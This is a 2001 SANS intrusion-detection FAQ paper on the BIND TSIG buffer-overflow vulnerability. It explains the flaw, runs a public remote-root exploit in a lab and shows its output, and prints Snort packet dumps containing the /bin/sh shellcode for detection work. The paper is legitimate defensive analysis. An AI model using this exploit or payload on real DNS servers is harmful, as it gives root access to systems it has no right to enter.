3 Days Left to Save $400 on SANS Security East 2015, New Orleans

Intrusion Detection FAQ: What is the TSIG vulnerability?

Paul Asadoorian
April 4, 2001

Introduction

Awareness for the Bind TSIG (short for transaction signature) attack was raised towards the end of January 2001. This attack effected all current versions of Bind version 4 and 8 (but not 9). Advisories are posted on Bugtraq (http://www.securityfocus.com/vdb/bottom.html?vid=2302), CVE (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0012), Cert (http://www.cert.org/advisories/CA-2001-02.html), and ISC�s web sites (Internet Software Consortium http://www.isc.org/products/BIND/bind-security.html).

PGP�s COVERT Labs found the exploit. The initial press release can be found at http://www.pgp.com/research/covert/advisories/047.asp. This new buffer overflow attack allows the attacker to gain root access to any DNS server that is running the correct (or incorrect, depending on how your are looking at it) version of Bind. To understand how this attack works you must first understand how buffer overflows work, as well as a little about how Bind operates at the application layer [2].

Buffer Overflows

Buffer overflows occur when a program does not check to make sure the data it is putting into a space will actually fit into that space. Unfortunately computers don�t automatically detect when this condition occurs, and since this happens in memory, the data will overwrite whatever comes after the space you are trying to fill. The "spaces" I am referring to are called variables, which for all intensive purposes reside on what�s called the stack (or Program Memory). The following diagram represents what your program, or any other program such as bind, would look like in memory [1] [5]:

-------------------
| Variable 1 |
-------------------
| Variable 2 |
-------------------
| Return Pointer |
-------------------
| Other Pointers |

Variables are always filled from the top moving down. You will notice there is always something below the variables, called the Return Pointer. This section of memory is used as a placeholder for when a program executes different functions. When a function is called the memory address of the current execution point if put here, the function executes, then jumps back to the value in the return pointer. When a buffer overflow condition occurs a variable will get filled with too much data, and since it gets filled from top to bottom, it will overwrite the return pointer [1].

-------------------
| Variable 1 |
-------------------
| My code |
-------------------
| Return Pointer |
| Ptr to my code |
-------------------
| Other Pointers |

So by filling a variable with more than it can hold we can re-write the return pointer and tell it to execute our code (the code will execute as whatever user the daemon is running as, often times root). This is not always very accurate way to execute code on a machine, often times the return pointer will not get the correct value. To figure out exactly where my code is and create a pointer to go execute it doesn�t always work because memory is so dynamic and volatile. The solution to this problem is called a nops command, which is an instruction that tells the computer to do nothing. So by padding the top of my program with nops commands I can be a lot less precise with my return pointer, as long as I hit somewhere in the nops code my malicious code will execute eventually [1] [7].

Bind � Infoleak & TSIG

The TSIG, or Transaction Signature, is a resource record that needs to append a secure key to the message sent to the DNS server. It is when a TSIG record is sent without a secure key that code is executed which does not check the bounds of the data before storing it into a variable. There is one problem with exploiting the TSIG code; you need to gather information about environment variables whose values are contained on the stack. Access to this information is accomplished by sending an IQUERY (Inverse Query) to the DNS server that will, due to a bug, return the information needed. This bug is known as Infoleak. So now we can start to build pattern for this exploit. If someone wants to use this exploit they will need to perform an IQUERY, followed by a TSIG record [4] [6].

The Attack

The code was taken from http://neworder.box.sk/showme.php3?id=4037 and is also posted on hack.co.za http://www.hack.co.za/exploits/daemon/named/tsig.c (I give two references here because often times these sites fall victim to the exploits they contain). It can also be found in Appendix A.

I was able to compile this code on a PC running Red Hat Linux 6.2. I ran it against another Red Hat Linux 6.2 machine, running Bind 8.2.2-P5. I was able to gain root access to the target machine. The following is what the attacker would see when the exploit is run (output has been sanitized):

[root@jabba /root]# ./tsig
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net
[*] usage : ./tsig host
[root@jabba /root]# ./tsig VICTOM
[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix
[*] fixed by ian@cypherpunks.ca and jwilkins@bitland.net
[*] attacking VICTOM (VICTOM)
[d] HEADER is 12 long
[d] infoleak_qry was 476 long
[*] iquery resp len = 719
[d] argevdisp1 = 080d7cd0, argevdisp2 = 4010f704
[*] retrieved stack offset = bffff9d8
[d] evil_query(buff, bffff9d8)
[d] shellcode is 134 long
[d] olb = 216
[*] injecting shellcode at 1
[*] connecting..
[*] wait for your shell..
Linux VICTOM 2.2.14-5.0 #1 Tue Mar 7 20:53:41 EST 2000 i586 unknown
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),
4(adm),6(disk),10(wheel)
ls
ADMROCKS
db.foo-zone
db.foo-rev-zone
db.domain.com
db.anotherdomain
db.mydomain.com
db.somoneelsesdomain.com
db.someotherdomain.com
db.somedomain.com
db.somedomain.net
db.somedomain.org
named-xfer
named.127.0.0
named.ca
named.local
named_dump.db

As you can see above I was able to gain root access to the target machine. You can clearly see as the program executes the order in which it carries out the attack. It starts with the Infoleak query, in which it gets a response whose length is 719 bytes. Then it extrapolates the information it needs and executes the "evil_query" function which sends the erroneous TSIG record, causing the buffer to overflow with the shellcode. Once it has a shell the program executes two Unix commands, �uname �a� and �id� to give you some information about the machine that you just compromised. Once the shell has been presented I was able to enter commands and issued the �ls� command for demonstration purposes.

Analyzing & Detecting the Attack

When I ran this exploit I was running snort 1.7 and told it to grab all packets on the network: (using ./snort �ved):

02/22-15:33:19.465555 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x206
ATTACKER:1024 -> VICTOM:53 UDP TTL:64 TOS:0x0 ID:6753 IpLen:20 DgmLen:504
Len: 484
BE EF 09 80 00 00 00 01 00 00 00 00 3E 00 00 00 ............>...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 ...........>....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 ..........>.....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 .........>......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 ........>.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 .......>........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 00 ......>.........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 FF ................
00 00 00 00 00 00 00 00 00 00 00 00 ............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.469874 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x2F9
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61854 IpLen:20 DgmLen:747
Len: 727
BE EF 89 81 00 00 00 00 00 00 00 00 3E 00 00 00 ............>...
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 ...........>....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 ..........>.....
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 .........>......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 ........>.......
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 .......>........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 3E 00 00 00 00 00 00 00 00 00 ......>.........
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 01 00 01 00 00 00 01 00 FF ................
00 00 00 00 00 00 00 00 00 00 00 00 98 77 95 3A .............w.:
20 8B 6F 12 06 00 00 00 48 D6 19 3B 06 00 00 00 .o.....H..;....
48 D6 19 3B 91 77 95 3A 58 76 3F 2E 94 F9 FF BF H..;.w.:Xv?.....
D6 39 08 08 02 00 04 00 C0 A8 00 03 00 00 00 00 .9..............
A0 31 2E C1 D8 F9 FF BF B5 6C 08 08 70 54 0D 08 .1.......l..pT..
7C 47 11 40 16 00 00 00 01 00 00 00 70 54 0D 08 |G.@........pT..
05 00 00 00 C0 EA 0B 08 16 00 00 00 01 00 00 00 ................
9C DE 05 08 7C 47 11 40 04 FA FF BF 50 54 0D 08 ....|G.@....PT..
00 00 00 00 08 FB FF BF 08 FB FF BF 09 D4 05 08 ................
70 54 0D 08 04 F7 10 40 EC A1 10 40 60 AE 00 40 pT.....@...@`..@
54 FB FF BF D5 BA 02 40 68 38 01 40 C8 43 01 40 T......@h8.@.C.@
D6 41 00 00 04 F7 10 40 62 5A 00 00 E6 81 00 40 .A.....@bZ.....@
D5 BA 02 40 04 40 02 40 68 38 01 40 D0 3E 01 40 ...@.@.@h8.@.>.@
58 90 04 08 60 3D 00 00 A0 3C 02 40 F3 06 00 00 X...`=...<.@....
D0 3F 02 40 70 CD 01 40 C8 43 01 40 03 00 00 00 .?.@p..@.C.@....
38 46 01 40 01 00 00 00 60 FA FF BF 08 87 04 8F.@....`......
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.472301 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x228
ATTACKER:1024 -> VICTOM:53 UDP TTL:64 TOS:0x0 ID:6755 IpLen:20 DgmLen:538
Len: 518
DE AD 01 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF <.............
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.476199 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x23F
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61855 IpLen:20 DgmLen:561
Len: 541
DE AD 81 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF 00 00 <...............
00 00 00 11 00 00 00 3A 95 77 98 01 2C 00 00 DE .......:.w..,...
AD 00 11 00 00 .....
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.476302 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x24E
ATTACKER -> VICTOM ICMP TTL:255 TOS:0xC0 ID:6757 IpLen:20 DgmLen:576
Type:3 Code:3 DESTINATION UNREACHABLE: PORT UNREACHABLE
** ORIGINAL DATAGRAM DUMP:
VICTOM:53 -> ATTACKER:1024 UDP TTL:64 TOS:0x0 ID:61855 IpLen:20 DgmLen:561
Len: 541
** END OF DUMP
00 00 00 00 45 00 02 31 F1 9F 00 00 40 11 05 C5 ....E..1....@...
C0 A8 00 04 C0 A8 00 03 00 35 04 00 02 1D 87 10 .........5......
DE AD 81 80 00 07 00 00 00 00 00 01 3F 00 01 02 ............?...
03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 12 ................
13 14 15 16 17 18 19 1A 1B 1C 1D 1E 1F 20 21 22 ............. !"
23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 #$%&'()*+,-./012
33 34 35 36 37 38 39 3A 3B 3C EB 0A 02 00 00 C0 3456789:;<......
00 00 00 00 00 3F 00 01 EB 44 5E 29 C0 89 46 10 .....?...D^)..F.
40 89 C3 89 46 0C 40 89 46 08 8D 4E 08 B0 66 CD @...F.@.F..N..f.
80 43 C6 46 10 10 66 89 5E 14 88 46 08 29 C0 89 .C.F..f.^..F.)..
C2 89 46 18 B0 90 66 89 46 16 8D 4E 14 89 4E 0C ..F...f.F..N..N.
8D 4E 08 EB 07 C0 00 00 00 00 00 3F EB 02 EB 43 .N.........?...C
B0 66 CD 80 89 5E 0C 43 43 B0 66 CD 80 89 56 0C .f...^.CC.f...V.
89 56 10 B0 66 43 CD 80 86 C3 B0 3F 29 C9 CD 80 .V..fC.....?)...
B0 3F 41 CD 80 B0 3F 41 CD 80 88 56 07 89 76 0C .?A...?A...V..v.
87 F3 8D 4B 0C B0 0B CD 80 EB 07 C0 00 00 00 00 ...K............
00 3F 90 E8 72 FF FF FF 2F 62 69 6E 2F 73 68 00 .?..r.../bin/sh.
0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B 1C 1D ................
1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B 2C 2D .. !"#$%&'()*+,-
2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B 3C EB ./0123456789:;<.
07 C0 00 00 00 00 00 3F 00 01 02 03 04 05 06 07 .......?........
08 09 0A 0B 0C 0D 0E 0F 10 11 12 13 14 15 16 17 ................
18 19 1A 1B 1C 1D 1E 1F 20 21 22 23 24 25 26 27 ........ !"#$%&'
28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 36 37 ()*+,-./01234567
38 39 3A 3B 3C EB 07 C0 00 00 00 00 00 3F 00 01 89:;<........?..
02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F 10 11 ................
D8 FA FF BF D8 F7 FF BF D0 7C 0D 08 04 F7 10 40 .........|.....@
22 23 24 25 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 "#$%&'()*+,-./01
32 33 34 35 36 37 38 39 3A 3B 3C EB 07 C0 00 00 23456789:;<.....
00 00 00 3F 00 01 02 03 04 05 06 07 08 09 0A 0B ...?............
0C 0D 0E 0F 10 11 12 13 14 15 16 17 18 19 1A 1B ................
1C 1D 1E 1F 20 21 22 23 24 25 26 27 28 29 2A 2B .... !"#$%&'()*+
2C 2D 2E 2F 30 31 32 33 34 35 36 37 38 39 3A 3B ,-./0123456789:;
3C EB 07 C0 00 00 00 00 00 00 00 FA 00 FF 00 00 <...............
00 00 00 11 00 00 00 3A .......:
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.494214 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x4A
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6758 IpLen:20 DgmLen:60 DF
******S* Seq: 0x657DB22 Ack: 0x0 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 936946 0 NOP WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.495108 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x4A
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61856 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x71CDF72 Ack: 0x657DB23 Win: 0x7D78 TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 275287630 936946 NOP
TCP Options => WS: 0
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.495220 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6759 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB23 Ack: 0x71CDF73 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936946 275287630
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.514153 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x51
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6760 IpLen:20 DgmLen:67 DF
***AP*** Seq: 0x657DB23 Ack: 0x71CDF73 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936948 275287630
75 6E 61 6D 65 20 2D 61 3B 20 69 64 3B 0A 00 uname -a; id;..
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.515099 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x42
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61857 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x71CDF73 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287632 936948
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.525372 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x84
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61858 IpLen:20 DgmLen:118 DF
***AP*** Seq: 0x71CDF73 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287633 936948
4C 69 6E 75 78 20 79 6F 64 61 20 32 2E 32 2E 31 Linux yoda 2.2.1
34 2D 35 2E 30 20 23 31 20 54 75 65 20 4D 61 72 4-5.0 #1 Tue Mar
20 37 20 32 30 3A 35 33 3A 34 31 20 45 53 54 20 7 20:53:41 EST
32 30 30 30 20 69 35 38 36 20 75 6E 6B 6E 6F 77 2000 i586 unknow
6E 0A n.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.525467 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6761 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB32 Ack: 0x71CDFB5 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936949 275287633
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.541777 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x9A
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61859 IpLen:20 DgmLen:140 DF
***AP*** Seq: 0x71CDFB5 Ack: 0x657DB32 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287635 936949
75 69 64 3D 30 28 72 6F 6F 74 29 20 67 69 64 3D uid=0(root) gid=
30 28 72 6F 6F 74 29 20 67 72 6F 75 70 73 3D 30 0(root) groups=0
28 72 6F 6F 74 29 2C 31 28 62 69 6E 29 2C 32 28 (root),1(bin),2(
64 61 65 6D 6F 6E 29 2C 33 28 73 79 73 29 2C 34 daemon),3(sys),4
28 61 64 6D 29 2C 36 28 64 69 73 6B 29 2C 31 30 (adm),6(disk),10
28 77 68 65 65 6C 29 0A (wheel).
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:19.544111 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x42
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6762 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x657DB32 Ack: 0x71CE00D Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 936951 275287635
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.833490 0:40:33:54:52:42 -> 0:40:33:55:A0:55 type:0x800 len:0x45
ATTACKER:1032 -> VICTOM:36864 TCP TTL:64 TOS:0x0 ID:6767 IpLen:20 DgmLen:55 DF
***AP*** Seq: 0x657DB32 Ack: 0x71CE00D Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 937179 275287635
6C 73 0A ls.
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
02/22-15:33:21.846546 0:40:33:55:A0:55 -> 0:40:33:54:52:42 type:0x800 len:0x126
VICTOM:36864 -> ATTACKER:1032 TCP TTL:64 TOS:0x0 ID:61860 IpLen:20 DgmLen:280 DF
***AP*** Seq: 0x71CE00D Ack: 0x657DB35 Win: 0x7D78 TcpLen: 32
TCP Options (3) => NOP NOP TS: 275287865 937179
41 44 4D 52 4F 43 4B 53 0A 64 62 2E 32 34 2E 30 ADMROCKS.db.24.0
2E 32 34 39 0A 64 62 2E 36 35 2E 32 2E 31 39 39 .249.db.65.2.199
0A 64 62 2E 63 70 75 2D 6E 65 2E 63 6F 6D 0A 64 .db.cpu-ne.com.d
62 2E 66 69 73 68 69 6E 70 72 6F 0A 64 62 2E 66 b.fishinpro.db.f
6F 6F 2D 62 79 74 65 2E 63 6F 6D 0A 64 62 2E 68 oo-byte.com.db.h
61 75 6E 74 65 64 6C 61 62 79 72 69 6E 74 68 2E auntedlabyrinth.
63 6F 6D 0A 64 62 2E 70 61 75 6C 64 6F 74 63 6F com.db.pauldotco
6D 0A 64 62 2E 72 69 6F 75 74 64 6F 6F 72 73 2E m.db.rioutdoors.
63 6F 6D 0A 64 62 2E 72 69 6F 75 74 64 6F 6F 72 com.db.rioutdoor
73 2E 6E 65 74 0A 64 62 2E 72 69 6F 75 74 64 6F s.net.db.rioutdo
6F 72 73 2E 6F 72 67 0A 6E 61 6D 65 64 2D 78 66 ors.org.named-xf
65 72 0A 6E 61 6D 65 64 2E 31 32 37 2E 30 2E 30 er.named.127.0.0
0A 6E 61 6D 65 64 2E 63 61 0A 6E 61 6D 65 64 2E .named.ca.named.
